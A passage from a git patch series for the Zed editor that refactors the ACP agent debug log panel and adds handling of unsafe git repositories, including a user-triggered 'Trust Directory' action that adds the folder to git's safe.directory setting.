Some(connection) = &mut this.watched_connection else { + let project = this.project.clone(); + let Some(connection) = this.selected_watched_connection_mut() else { return; }; let Some(message) = connection.messages.get_mut(index) else { return; }; - message.expanded(this.project.read(cx).languages().clone(), cx); + message.expanded(project.read(cx).languages().clone(), cx); connection.list_state.scroll_to_reveal_item(index); } cx.notify() })) .child(match message.direction { - StreamMessageDirection::Incoming => Icon::new(IconName::ArrowDown) + AcpDebugMessageDirection::Incoming => Icon::new(IconName::ArrowDown) .color(Color::Error) .size(IconSize::Small), - StreamMessageDirection::Outgoing => Icon::new(IconName::ArrowUp) + AcpDebugMessageDirection::Outgoing => Icon::new(IconName::ArrowUp) .color(Color::Success) .size(IconSize::Small), - StreamMessageDirection::Stderr => Icon::new(IconName::Warning) + AcpDebugMessageDirection::Stderr => Icon::new(IconName::Warning) .color(Color::Warning) .size(IconSize::Small), }) @@ -645,10 +519,79 @@ impl AcpTools { } } +fn push_stream_message_for_connection( + connection: &mut WatchedConnection, + project: &Entity, + stream_message: AcpDebugMessage, + cx: &mut App, +) { + let language_registry = project.read(cx).languages().clone(); + let index = connection.messages.len(); + + let (request_id, method, message_type, params) = match stream_message.message { + AcpDebugMessageContent::Request { id, method, params } => { + let method_map = match stream_message.direction { + AcpDebugMessageDirection::Incoming => &mut connection.incoming_request_methods, + AcpDebugMessageDirection::Outgoing => &mut connection.outgoing_request_methods, + AcpDebugMessageDirection::Stderr => return, + }; + + method_map.insert(id.clone(), method.clone()); + (Some(id), method.into(), MessageType::Request, Ok(params)) + } + AcpDebugMessageContent::Response { id, result } => { + let method_map = match stream_message.direction { + 
AcpDebugMessageDirection::Incoming => &mut connection.outgoing_request_methods, + AcpDebugMessageDirection::Outgoing => &mut connection.incoming_request_methods, + AcpDebugMessageDirection::Stderr => return, + }; + + if let Some(method) = method_map.remove(&id) { + (Some(id), method.into(), MessageType::Response, result) + } else { + ( + Some(id), + "[unrecognized response]".into(), + MessageType::Response, + result, + ) + } + } + AcpDebugMessageContent::Notification { method, params } => { + (None, method.into(), MessageType::Notification, Ok(params)) + } + AcpDebugMessageContent::Stderr { line } => ( + None, + "stderr".into(), + MessageType::Stderr, + Ok(Some(serde_json::Value::String(line.to_string()))), + ), + }; + + let message = WatchedConnectionMessage { + name: method, + message_type, + request_id, + direction: stream_message.direction, + collapsed_params_md: match ¶ms { + Ok(Some(params)) => Some(collapsed_params_md(params, &language_registry, cx)), + Ok(None) => None, + Err(err) => serde_json::to_value(err) + .ok() + .map(|err| collapsed_params_md(&err, &language_registry, cx)), + }, + expanded_params_md: None, + params, + }; + + connection.messages.push(message); + connection.list_state.splice(index..index, 1); +} + struct WatchedConnectionMessage { name: SharedString, request_id: Option, - direction: StreamMessageDirection, + direction: AcpDebugMessageDirection, message_type: MessageType, params: Result, acp::Error>, collapsed_params_md: Option>, @@ -732,8 +675,7 @@ impl Item for AcpTools { fn tab_content_text(&self, _detail: usize, _cx: &App) -> ui::SharedString { format!( "ACP: {}", - self.watched_connection - .as_ref() + self.selected_watched_connection() .map_or("Disconnected", |connection| connection.agent_id.0.as_ref()) ) .into() @@ -752,11 +694,67 @@ impl Focusable for AcpTools { impl Render for AcpTools { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { + let has_messages = self + .selected_watched_connection() + 
.is_some_and(|connection| !connection.messages.is_empty()); + let can_restart = matches!( + self.selected_connection_status(cx), + Some(status) if status != AgentConnectionStatus::Connecting + ); + let copied_messages = self.serialize_observed_messages().unwrap_or_default(); + v_flex() .track_focus(&self.focus_handle) .size_full() .bg(cx.theme().colors().editor_background) - .child(match self.watched_connection.as_ref() { + .child( + h_flex() + .w_full() + .px_3() + .py_2() + .items_center() + .justify_between() + .gap_2() + .border_b_1() + .border_color(cx.theme().colors().border) + .child( + DropdownMenu::new( + "acp-connection-selector", + self.selected_connection_label(), + self.connection_menu(window, cx), + ) + .style(DropdownStyle::Subtle) + .disabled(self.watched_connections.is_empty()), + ) + .child( + h_flex() + .gap_2() + .child( + IconButton::new("restart_connection", IconName::RotateCw) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("Restart Connection")) + .disabled(!can_restart) + .on_click(cx.listener(|this, _, _window, cx| { + this.restart_selected_connection(cx); + })), + ) + .child( + CopyButton::new("copy-all-messages", copied_messages) + .tooltip_label("Copy All Messages") + .disabled(!has_messages), + ) + .child( + IconButton::new("clear_messages", IconName::Trash) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("Clear Messages")) + .disabled(!has_messages) + .on_click(cx.listener(|this, _, _window, cx| { + this.clear_messages(cx); + })), + ), + ), + ) + .child(match self.selected_watched_connection() { Some(connection) => { if connection.messages.is_empty() { h_flex() @@ -781,12 +779,23 @@ impl Render for AcpTools { .into_any() } } - None => h_flex() - .size_full() - .justify_center() - .items_center() - .child("No active connection") - .into_any(), + None => match self.selected_connection_status(cx) { + Some(AgentConnectionStatus::Connecting) => h_flex() + .size_full() + .justify_center() + .items_center() + .child(format!( + 
"Reconnecting to {}", + self.selected_connection_label() + )) + .into_any(), + _ => h_flex() + .size_full() + .justify_center() + .items_center() + .child("No active connection") + .into_any(), + }, }) } } @@ -803,45 +812,8 @@ impl AcpToolsToolbarItemView { impl Render for AcpToolsToolbarItemView { fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { - let Some(acp_tools) = self.acp_tools.as_ref() else { - return Empty.into_any_element(); - }; - - let acp_tools = acp_tools.clone(); - let connection_registry = acp_tools.read(cx).connection_registry.clone(); - let has_messages = acp_tools - .read(cx) - .watched_connection - .as_ref() - .is_some_and(|connection| !connection.messages.is_empty()); - - h_flex() - .gap_2() - .child({ - let message = acp_tools - .read(cx) - .serialize_observed_messages() - .unwrap_or_default(); - - CopyButton::new("copy-all-messages", message) - .tooltip_label("Copy All Messages") - .disabled(!has_messages) - }) - .child( - IconButton::new("clear_messages", IconName::Trash) - .icon_size(IconSize::Small) - .tooltip(Tooltip::text("Clear Messages")) - .disabled(!has_messages) - .on_click(cx.listener(move |_this, _, _window, cx| { - connection_registry.update(cx, |registry, cx| { - registry.clear_messages(cx); - }); - acp_tools.update(cx, |acp_tools, cx| { - acp_tools.clear_messages(cx); - }); - })), - ) - .into_any() + let _ = (&self.acp_tools, cx); + Empty.into_any_element() } } @@ -859,7 +831,7 @@ impl ToolbarItemView for AcpToolsToolbarItemView { { self.acp_tools = Some(acp_tools); cx.notify(); - return ToolbarItemLocation::PrimaryRight; + return ToolbarItemLocation::Hidden; } if self.acp_tools.take().is_some() { cx.notify(); diff --git a/crates/agent_servers/Cargo.toml b/crates/agent_servers/Cargo.toml index 1a12a5415731b4..e58a0ce81d4e0b 100644 --- a/crates/agent_servers/Cargo.toml +++ b/crates/agent_servers/Cargo.toml @@ -6,7 +6,7 @@ publish.workspace = true license = "GPL-3.0-or-later" [features] 
-test-support = ["acp_tools/test-support", "acp_thread/test-support", "gpui/test-support", "project/test-support", "dep:env_logger", "client/test-support", "dep:gpui_tokio", "reqwest_client/test-support"] +test-support = ["acp_thread/test-support", "gpui/test-support", "project/test-support", "dep:env_logger", "client/test-support", "dep:gpui_tokio", "reqwest_client/test-support"] e2e = [] [lints] @@ -17,7 +17,6 @@ path = "src/agent_servers.rs" doctest = false [dependencies] -acp_tools.workspace = true acp_thread.workspace = true action_log.workspace = true async-channel.workspace = true diff --git a/crates/agent_servers/src/acp.rs b/crates/agent_servers/src/acp.rs index 57ca7ddeac7a77..832b6afe04873a 100644 --- a/crates/agent_servers/src/acp.rs +++ b/crates/agent_servers/src/acp.rs @@ -2,13 +2,13 @@ use acp_thread::{ AgentConnection, AgentSessionInfo, AgentSessionList, AgentSessionListRequest, AgentSessionListResponse, }; -use acp_tools::AcpConnectionRegistry; use action_log::ActionLog; use agent_client_protocol::schema::{self as acp, ErrorCode}; use agent_client_protocol::{ Agent, Client, ConnectionTo, JsonRpcResponse, Lines, Responder, SentRequest, }; use anyhow::anyhow; +use async_channel; use collections::HashMap; use feature_flags::{AcpBetaFeatureFlag, FeatureFlagAppExt as _}; use futures::channel::mpsc; @@ -22,8 +22,8 @@ use serde::Deserialize; use std::path::PathBuf; use std::process::Stdio; use std::rc::Rc; -use std::sync::Arc; -use std::{any::Any, cell::RefCell}; +use std::sync::{Arc, Mutex}; +use std::{any::Any, cell::RefCell, collections::VecDeque}; use task::{Shell, ShellBuilder, SpawnInTerminal}; use thiserror::Error; use util::ResultExt as _; @@ -40,6 +40,162 @@ use terminal::terminal_settings::{AlternateScroll, CursorShape}; use crate::GEMINI_ID; pub const GEMINI_TERMINAL_AUTH_METHOD_ID: &str = "spawn-gemini-cli"; +const MAX_DEBUG_BACKLOG_MESSAGES: usize = 2000; + +#[derive(Clone, Copy, Debug, PartialEq, Eq)] +pub enum AcpDebugMessageDirection { + 
Incoming, + Outgoing, + Stderr, +} + +#[derive(Clone)] +pub enum AcpDebugMessageContent { + Request { + id: acp::RequestId, + method: Arc, + params: Option, + }, + Response { + id: acp::RequestId, + result: Result, acp::Error>, + }, + Notification { + method: Arc, + params: Option, + }, + Stderr { + line: Arc, + }, +} + +#[derive(Clone)] +pub struct AcpDebugMessage { + pub direction: AcpDebugMessageDirection, + pub message: AcpDebugMessageContent, +} + +impl AcpDebugMessage { + fn parse(direction: AcpDebugMessageDirection, line: &str) -> Option { + if direction == AcpDebugMessageDirection::Stderr { + return Some(Self { + direction, + message: AcpDebugMessageContent::Stderr { + line: Arc::from(line), + }, + }); + } + + let value: serde_json::Value = serde_json::from_str(line).ok()?; + let object = value.as_object()?; + + let parsed_id = object + .get("id") + .map(|raw| serde_json::from_value::(raw.clone())); + + let message = if let Some(method) = object.get("method").and_then(|method| method.as_str()) + { + match parsed_id { + Some(Ok(id)) => AcpDebugMessageContent::Request { + id, + method: method.into(), + params: object.get("params").cloned(), + }, + Some(Err(err)) => { + log::warn!("Skipping JSON-RPC message with unparsable id: {err}"); + return None; + } + None => AcpDebugMessageContent::Notification { + method: method.into(), + params: object.get("params").cloned(), + }, + } + } else if let Some(parsed_id) = parsed_id { + let id = match parsed_id { + Ok(id) => id, + Err(err) => { + log::warn!("Skipping JSON-RPC response with unparsable id: {err}"); + return None; + } + }; + + if let Some(error) = object.get("error") { + let acp_error = + serde_json::from_value::(error.clone()).unwrap_or_else(|err| { + log::warn!("Failed to deserialize ACP error: {err}"); + acp::Error::internal_error().data(error.to_string()) + }); + + AcpDebugMessageContent::Response { + id, + result: Err(acp_error), + } + } else { + AcpDebugMessageContent::Response { + id, + result: 
Ok(object.get("result").cloned()), + } + } + } else { + return None; + }; + + Some(Self { direction, message }) + } +} + +#[derive(Default)] +struct AcpDebugLogState { + messages: VecDeque, + subscribers: Vec>, +} + +#[derive(Clone, Default)] +struct AcpDebugLog { + state: Arc>, +} + +impl AcpDebugLog { + fn subscribe( + &self, + ) -> ( + Vec, + async_channel::Receiver, + ) { + let mut state = self + .state + .lock() + .unwrap_or_else(|poisoned| poisoned.into_inner()); + let backlog = state.messages.iter().cloned().collect(); + let (sender, receiver) = async_channel::unbounded(); + state.subscribers.push(sender); + (backlog, receiver) + } + + fn record_line(&self, direction: AcpDebugMessageDirection, line: &str) { + let Some(message) = AcpDebugMessage::parse(direction, line) else { + return; + }; + self.record_message(message); + } + + fn record_message(&self, message: AcpDebugMessage) { + let mut state = self + .state + .lock() + .unwrap_or_else(|poisoned| poisoned.into_inner()); + + if state.messages.len() == MAX_DEBUG_BACKLOG_MESSAGES { + state.messages.pop_front(); + } + state.messages.push_back(message.clone()); + + state.subscribers.retain(|sender| !sender.is_closed()); + for sender in &state.subscribers { + sender.try_send(message.clone()).log_err(); + } + } +} /// Awaits the response to an ACP request from a GPUI foreground task. /// @@ -240,6 +396,7 @@ pub struct AcpConnection { default_config_options: HashMap, child: Option, session_list: Option>, + debug_log: AcpDebugLog, _io_task: Task<()>, _dispatch_task: Task<()>, _wait_task: Task>, @@ -484,6 +641,15 @@ fn connect_client_future( } impl AcpConnection { + pub fn subscribe_debug_messages( + &self, + ) -> ( + Vec, + async_channel::Receiver, + ) { + self.debug_log.subscribe() + } + pub async fn stdio( agent_id: AgentId, project: Entity, @@ -563,39 +729,28 @@ impl AcpConnection { // Set up the foreground dispatch channel for bridging Send handler // closures to the !Send foreground thread. 
let (dispatch_tx, dispatch_rx) = mpsc::unbounded::(); - - // Register this connection with the logs panel registry. The - // returned tap is opt-in: until someone subscribes to the ACP logs - // panel, `emit_*` calls below are ~free (atomic load + return). - let log_tap = cx.update(|cx| { - AcpConnectionRegistry::default_global(cx).update(cx, |registry, cx| { - registry.set_active_connection(agent_id.clone(), cx) - }) - }); + let debug_log = AcpDebugLog::default(); let incoming_lines = futures::io::BufReader::new(stdout).lines(); let tapped_incoming = incoming_lines.inspect({ - let log_tap = log_tap.clone(); + let debug_log = debug_log.clone(); move |result| match result { - Ok(line) => log_tap.emit_incoming(line), + Ok(line) => debug_log.record_line(AcpDebugMessageDirection::Incoming, line), Err(err) => { - // I/O errors on the transport are fatal for the SDK, but - // without logging them the ACP logs panel shows no trace - // of why the connection died. log::warn!("ACP transport read error: {err}"); } } }); let tapped_outgoing = futures::sink::unfold( - (Box::pin(stdin), log_tap.clone()), - async move |(mut writer, log_tap), line: String| { + (Box::pin(stdin), debug_log.clone()), + async move |(mut writer, debug_log), line: String| { use futures::AsyncWriteExt; - log_tap.emit_outgoing(&line); + debug_log.record_line(AcpDebugMessageDirection::Outgoing, &line); let mut bytes = line.into_bytes(); bytes.push(b'\n'); writer.write_all(&bytes).await?; - Ok::<_, std::io::Error>((writer, log_tap)) + Ok::<_, std::io::Error>((writer, debug_log)) }, ); @@ -633,7 +788,7 @@ impl AcpConnection { }); let stderr_task = cx.background_spawn({ - let log_tap = log_tap.clone(); + let debug_log = debug_log.clone(); async move { let mut stderr = BufReader::new(stderr); let mut line = String::new(); @@ -642,7 +797,7 @@ impl AcpConnection { { let trimmed = line.trim_end_matches(['\n', '\r']); log::warn!("agent stderr: {trimmed}"); - log_tap.emit_stderr(trimmed); + 
debug_log.record_line(AcpDebugMessageDirection::Stderr, trimmed); line.clear(); } Ok(()) @@ -738,6 +893,7 @@ impl AcpConnection { default_model, default_config_options, session_list, + debug_log, _io_task: io_task, _dispatch_task: dispatch_task, _wait_task: wait_task, @@ -774,6 +930,7 @@ impl AcpConnection { default_config_options: HashMap::default(), child: None, session_list: None, + debug_log: AcpDebugLog::default(), _io_task: io_task, _dispatch_task: dispatch_task, _wait_task: Task::ready(Ok(())), diff --git a/crates/agent_servers/src/agent_servers.rs b/crates/agent_servers/src/agent_servers.rs index 9c1d36bf9a7ff7..64e97de229959d 100644 --- a/crates/agent_servers/src/agent_servers.rs +++ b/crates/agent_servers/src/agent_servers.rs @@ -22,7 +22,10 @@ use std::{any::Any, rc::Rc, sync::Arc}; pub use acp::test_support::{ FakeAcpAgentServer, FakeAcpConnectionHarness, connect_fake_acp_connection, }; -pub use acp::{AcpConnection, GEMINI_TERMINAL_AUTH_METHOD_ID}; +pub use acp::{ + AcpConnection, AcpDebugMessage, AcpDebugMessageContent, AcpDebugMessageDirection, + GEMINI_TERMINAL_AUTH_METHOD_ID, +}; pub struct AgentServerDelegate { store: Entity, diff --git a/crates/agent_ui/src/agent_connection_store.rs b/crates/agent_ui/src/agent_connection_store.rs index 218347d5c57c21..a01f19dd0f222b 100644 --- a/crates/agent_ui/src/agent_connection_store.rs +++ b/crates/agent_ui/src/agent_connection_store.rs @@ -1,6 +1,7 @@ use std::rc::Rc; use acp_thread::{AgentConnection, LoadError}; +use agent_servers::AcpConnection; use agent_servers::{AgentServer, AgentServerDelegate}; use anyhow::Result; use collections::HashMap; @@ -58,6 +59,12 @@ pub enum AgentConnectionEntryEvent { impl EventEmitter for AgentConnectionEntry {} +#[derive(Clone)] +pub struct ActiveAcpConnection { + pub agent_id: project::AgentId, + pub connection: Rc, +} + pub struct AgentConnectionStore { project: Entity, entries: HashMap>, @@ -90,6 +97,25 @@ impl AgentConnectionStore { 
.unwrap_or(AgentConnectionStatus::Disconnected) } + pub fn active_acp_connections(&self, cx: &App) -> Vec { + self.entries + .values() + .filter_map(|entry| match entry.read(cx) { + AgentConnectionEntry::Connected(state) => state + .connection + .clone() + .downcast::() + .map(|connection| ActiveAcpConnection { + agent_id: state.connection.agent_id(), + connection, + }), + AgentConnectionEntry::Connecting { .. } | AgentConnectionEntry::Error { .. } => { + None + } + }) + .collect() + } + pub fn restart_connection( &mut self, key: Agent, @@ -144,6 +170,7 @@ impl AgentConnectionStore { } }) .ok(); + cx.notify(); }) .ok(); } diff --git a/crates/agent_ui/src/agent_ui.rs b/crates/agent_ui/src/agent_ui.rs index d7a8adf80ec953..4e37911f29497e 100644 --- a/crates/agent_ui/src/agent_ui.rs +++ b/crates/agent_ui/src/agent_ui.rs @@ -1,5 +1,5 @@ mod agent_configuration; -pub(crate) mod agent_connection_store; +pub mod agent_connection_store; mod agent_diff; mod agent_model_selector; mod agent_panel; @@ -60,6 +60,7 @@ use std::any::TypeId; use workspace::Workspace; use crate::agent_configuration::{ConfigureContextServerModal, ManageProfilesModal}; +pub use crate::agent_connection_store::{ActiveAcpConnection, AgentConnectionStore}; pub use crate::agent_panel::{AgentPanel, AgentPanelEvent, MaxIdleRetainedThreads}; use crate::agent_registry_ui::AgentRegistryPage; pub use crate::inline_assistant::InlineAssistant; From c4a6d1ec17bc91681fcd5da8e7ce9e3426939d77 Mon Sep 17 00:00:00 2001 From: Dino Date: Fri, 24 Apr 2026 18:14:24 +0100 Subject: [PATCH 025/231] git: Improve handling of unsafe repositories (#43693) These changes update Zed's Git Panel to be able to detect unsafe git repositories, where the user running Zed doesn't own the `.git` directory, and show a dedicated empty view in the Git Panel that not only explains the situation but also allows the user to choose whether to trust this directory, which will end up running `git config --global --add safe.directory `. 
While testing those changes, it was noted that attempting to add or reset files after trusting the directory would fail, as expected, but the UI wouldn't react to the fact that those operations failed. What this means is, if the user tried to add a file, the UI would show a checkmark for that file and, after the operation failed, the checkmark would remain. We now revert that, for both `git add` and `git reset`. Some more technical notes on this change: - Introduce `project::git_store::GitAccess` enum to express whether we actually have access to the repository, exposed via `git::Repository::access`, which probes the backend with a `git status` command and classifies the result. - On unsafe repositories, `project::git_store::LocalRepositoryState::new` fails to spawn the git worker, which now cleanly signals `GitAccess::No` rather than leaving the panel in a broken state. - Updated `git_ui::git_panel::GitPanel::render_empty_state` with a third alternative, when `GitAccess::No`, that basically renders a view explaining why the repository is considered unsafe, together with buttons for git's documentation on safe directories and a button to add the repository's folder as a safe directory - Updated `project::git_store::GitStore` to now watch `~/.gitconfig` and `$XDG_CONFIG_HOME/git/config`. Watching this files allows the Git Panel to react when the git configuration is updated, which will be the case if the user decides to trust the repository. When either changes, a `GitStoreEvent::GlobalConfigurationUpdated` event is emitted and the panel refetches repository state. - Added `project::git_store::Repository::refetch_repo_state` field, which stores a closure to allow recreating the `Repository::repository_state` and the job sender after the repository's directory is trusted, without requiring a project reload. - Added a `fs::Fs::git_config` trait method, wrapping a real `git config` invocation. 
In order to be able to call this, both `git_store::GitStore::git_config` and `project::Project::git_config` wrappers have also been introduced. Worth mentioning that this isn't yet supported for remote projects or collab guests. - Updated `fs::Fs::git_clone` argument order to match `fs::Fs::git_config` and `fs::Fs::git_init`. - Added a new `project::git_store::pending_op::PendingOps::last_op_errored` method that allows determining whether the last pending operation failed. This now allows us to filter out failed operations when determining whether `git add` or `git reset` failed, so that we can fall through to the real git status. - Updated `git_ui::git_panel::GitPanel::change_file_stage` to now call `update_counts` in its error branch so the cached staged counters stay consistent with the reverted per-entry state, seeing as we now handle reverting the UI state if an operation fails. - Fixed `fs::RealFs::git_init` to fall back to the provided branch name when `git config --global --get init.defaultBranch` fails, for example, when the user hasn't configured one. 
Co-authored-by: cameron Closes #42286 Release Notes: - Added a dedicated empty state in the Git Panel for unsafe repositories, with a "Trust Directory" button that adds the repository to `safe.directory` - Fixed stage and unstage checkboxes in the Git Panel not reverting when a `git add` or `git reset` command failed --------- Co-authored-by: cameron Co-authored-by: Piotr Osiewicz <24362066+osiewicz@users.noreply.github.com> --- crates/fs/src/fs.rs | 48 +++-- crates/git_ui/src/clone.rs | 2 +- crates/git_ui/src/git_panel.rs | 231 ++++++++++++++++----- crates/project/src/git_store.rs | 190 ++++++++++++++--- crates/project/src/git_store/pending_op.rs | 6 + crates/project/src/project.rs | 4 + 6 files changed, 391 insertions(+), 90 deletions(-) diff --git a/crates/fs/src/fs.rs b/crates/fs/src/fs.rs index 5b505d4d7a0acc..2d716f8e519bb4 100644 --- a/crates/fs/src/fs.rs +++ b/crates/fs/src/fs.rs @@ -13,7 +13,6 @@ use gpui::BackgroundExecutor; use gpui::Global; use gpui::ReadGlobal as _; use gpui::SharedString; -use std::borrow::Cow; #[cfg(unix)] use std::ffi::CString; use util::command::new_command; @@ -287,7 +286,8 @@ pub trait Fs: Send + Sync { ) -> Result>; async fn git_init(&self, abs_work_directory: &Path, fallback_branch_name: String) -> Result<()>; - async fn git_clone(&self, repo_url: &str, abs_work_directory: &Path) -> Result<()>; + async fn git_clone(&self, abs_work_directory: &Path, repo_url: &str) -> Result<()>; + async fn git_config(&self, abs_work_directory: &Path, args: Vec) -> Result; fn is_fake(&self) -> bool; async fn is_case_sensitive(&self) -> bool; fn subscribe_to_jobs(&self) -> JobEventReceiver; @@ -1283,19 +1283,19 @@ impl Fs for RealFs { abs_work_directory_path: &Path, fallback_branch_name: String, ) -> Result<()> { - let config = new_command("git") + let result = new_command("git") .current_dir(abs_work_directory_path) .args(&["config", "--global", "--get", "init.defaultBranch"]) .output() - .await?; - - let branch_name; + .await; - if 
config.status.success() && !config.stdout.is_empty() { - branch_name = String::from_utf8_lossy(&config.stdout); - } else { - branch_name = Cow::Borrowed(fallback_branch_name.as_str()); - } + // In case the `git config` command fails, which would be the case if + // the user doesn't have an `init.defaultBranch` value set, we'll just + // default to the provided `fallback_branch_name`. + let branch_name = match result { + Ok(output) if !output.stdout.is_empty() => String::from_utf8(output.stdout)?, + _ => fallback_branch_name, + }; new_command("git") .current_dir(abs_work_directory_path) @@ -1307,7 +1307,7 @@ impl Fs for RealFs { Ok(()) } - async fn git_clone(&self, repo_url: &str, abs_work_directory: &Path) -> Result<()> { + async fn git_clone(&self, abs_work_directory: &Path, repo_url: &str) -> Result<()> { let job_id = self.next_job_id.fetch_add(1, Ordering::SeqCst); let job_info = JobInfo { id: job_id, @@ -1333,6 +1333,24 @@ impl Fs for RealFs { Ok(()) } + /// Runs `git config` with the given arguments. + /// Will return `Ok` if the commands exit status is `0`, with the stdout + /// contents. Otherwise returns `Err` with the stderr contents. 
+ async fn git_config(&self, abs_work_directory: &Path, args: Vec) -> Result { + let output = new_command("git") + .current_dir(abs_work_directory) + .args([String::from("config")].into_iter().chain(args)) + .output() + .await?; + + if !output.status.success() { + let err = String::from_utf8(output.stderr)?; + anyhow::bail!(err); + } + + String::from_utf8(output.stdout).map_err(Into::into) + } + fn is_fake(&self) -> bool { false } @@ -3245,10 +3263,14 @@ impl Fs for FakeFs { self.create_dir(&abs_work_directory_path.join(".git")).await } - async fn git_clone(&self, _repo_url: &str, _abs_work_directory: &Path) -> Result<()> { + async fn git_clone(&self, _abs_work_directory: &Path, _repo_url: &str) -> Result<()> { anyhow::bail!("Git clone is not supported in fake Fs") } + async fn git_config(&self, _abs_work_directory: &Path, _args: Vec) -> Result { + anyhow::bail!("Git config is not supported in fake Fs") + } + fn is_fake(&self) -> bool { true } diff --git a/crates/git_ui/src/clone.rs b/crates/git_ui/src/clone.rs index b3b8a9ed6fb302..61b6275eb91221 100644 --- a/crates/git_ui/src/clone.rs +++ b/crates/git_ui/src/clone.rs @@ -39,7 +39,7 @@ pub fn clone_and_open( let destination_dir = destination_dir.clone(); let repo_url = repo_url.clone(); cx.spawn(async move |_workspace, _cx| { - fs.git_clone(&repo_url, destination_dir.as_path()).await + fs.git_clone(destination_dir.as_path(), &repo_url).await }) }) .ok()?; diff --git a/crates/git_ui/src/git_panel.rs b/crates/git_ui/src/git_panel.rs index ebb2e3c1c26206..1e53c1cf53e315 100644 --- a/crates/git_ui/src/git_panel.rs +++ b/crates/git_ui/src/git_panel.rs @@ -22,6 +22,7 @@ use editor::{ use editor::{EditorStyle, RewrapOptions}; use file_icons::FileIcons; use futures::StreamExt as _; +use futures::channel::oneshot::Canceled; use git::commit::ParsedCommitMessage; use git::repository::{ Branch, CommitDetails, CommitOptions, CommitSummary, DiffType, FetchOptions, GitCommitTemplate, @@ -51,6 +52,7 @@ use menu; use 
multi_buffer::ExcerptBoundaryInfo; use notifications::status_toast::StatusToast; use panel::{PanelHeader, panel_button, panel_filled_button, panel_icon_button}; +use project::git_store::GitAccess; use project::{ Fs, Project, ProjectPath, git_store::{GitStoreEvent, Repository, RepositoryEvent, RepositoryId, pending_op}, @@ -656,6 +658,7 @@ pub struct GitPanel { stash_entries: GitStash, _settings_subscription: Subscription, + git_access: GitAccess, } #[derive(Clone, Debug, PartialEq, Eq)] @@ -786,6 +789,7 @@ impl GitPanel { ) | GitStoreEvent::RepositoryAdded | GitStoreEvent::RepositoryRemoved(_) + | GitStoreEvent::GlobalConfigurationUpdated | GitStoreEvent::ActiveRepositoryChanged(_) => { this.schedule_update(window, cx); } @@ -843,6 +847,7 @@ impl GitPanel { bulk_staging: None, stash_entries: Default::default(), _settings_subscription, + git_access: GitAccess::Yes, }; this.schedule_update(window, cx); @@ -1744,11 +1749,18 @@ impl GitPanel { // 3. finally, if there is no info about this `entry` in the repo, we fall back to whatever status is encoded // in `entry` arg. repo.pending_ops_for_path(&entry.repo_path) - .map(|ops| { + .and_then(|ops| { + // In case the last operation in the list of pending operations + // failed, we can't assume the stage status for this entry and + // need to fallback to the actual state in the repo. 
+ if ops.last_op_errored() { + return None; + } + if ops.staging() || ops.staged() { - StageStatus::Staged + Some(StageStatus::Staged) } else { - StageStatus::Unstaged + Some(StageStatus::Unstaged) } }) .or_else(|| { @@ -1950,6 +1962,7 @@ impl GitPanel { this.update(cx, |this, cx| { if let Err(err) = result { this.show_error_toast(if stage { "add" } else { "reset" }, err, cx); + this.update_counts(active_repository.read(cx)); } cx.notify(); }) @@ -3110,6 +3123,37 @@ impl GitPanel { .detach_and_log_err(cx); } + /// Updates git's configuration, adding the directory of the current + /// worktree to the `safe.directory` config, ensuring that, even if the user + /// that's running the application is not the owner of `.git/`, it can still + /// read the repository's contents. + fn add_safe_directory(&mut self, window: &mut Window, cx: &mut Context) { + let Some(active_repository) = &self.active_repository else { + return; + }; + + let path = active_repository.update(cx, |repository, _cx| { + repository.snapshot().work_directory_abs_path + }); + + if let Some(path_str) = path.to_str() { + let path_arg = String::from(path_str); + let args = vec![ + String::from("--global"), + String::from("--add"), + String::from("safe.directory"), + path_arg, + ]; + + cx.spawn_in(window, async move |git_panel, cx| { + git_panel.update(cx, |git_panel, cx| { + git_panel.project.read(cx).git_config(path, args, cx) + }) + }) + .detach(); + } + } + pub fn create_pull_request(&self, window: &mut Window, cx: &mut Context) { let result = (|| -> anyhow::Result<()> { let repo = self @@ -3507,11 +3551,37 @@ impl GitPanel { self.tracked_staged_count = 0; self.entry_count = 0; self.max_width_item_index = None; + self.git_access = GitAccess::Yes; let sort_by_path = GitPanelSettings::get_global(cx).sort_by_path; let is_tree_view = matches!(self.view_mode, GitPanelViewMode::Tree(_)); let group_by_status = is_tree_view || !sort_by_path; + if let Some(active_repo) = self.active_repository.as_ref() { + let 
access = active_repo.update(cx, |active_repo, cx| active_repo.access(cx)); + + cx.spawn_in(window, async move |git_panel, cx| { + // When the user does not own the `.git` folder, the + // `GitStore.spawn_local_git_worker` will fail to create the + // receiver for Git jobs, so this access check will be + // cancelled. + // + // We assume `GitAccess::No` on cancellation. I believe this is + // imprecise, other failures could also cause cancellation, but + // the consequence is just showing the "unsafe repo" UI, which + // seems acceptable for this edge case. + let access = match access.await { + Ok(access) => access, + Err(Canceled) => GitAccess::No, + }; + + git_panel.update(cx, |this, _cx| { + this.git_access = access; + }) + }) + .detach_and_log_err(cx); + } + let mut changed_entries = Vec::new(); let mut new_entries = Vec::new(); let mut conflict_entries = Vec::new(); @@ -4205,6 +4275,10 @@ impl GitPanel { window: &mut Window, cx: &mut Context, ) -> Option { + if matches!(self.git_access, GitAccess::No) { + return None; + } + self.active_repository.as_ref()?; let (text, action, stage, tooltip) = @@ -4659,17 +4733,10 @@ impl GitPanel { } fn render_empty_state(&self, cx: &mut Context) -> impl IntoElement { - let has_repo = self.active_repository.is_some(); - let has_no_repo = self.active_repository.is_none(); - let worktree_count = self.project.read(cx).visible_worktrees(cx).count(); - - let should_show_branch_diff = - has_repo && self.changes_count == 0 && !self.is_on_main_branch(cx); - - let label = if has_repo { - "No changes to commit" - } else { - "No Git repositories" + let children = match (self.git_access, &self.active_repository) { + (GitAccess::No, Some(repository)) => self.render_unsafe_repo_ui(repository, cx), + (_, None) => self.render_uninitialized_ui(cx), + (_, Some(_)) => self.render_no_changes_ui(cx), }; v_flex() @@ -4677,40 +4744,110 @@ impl GitPanel { .flex_1() .items_center() .justify_center() - 
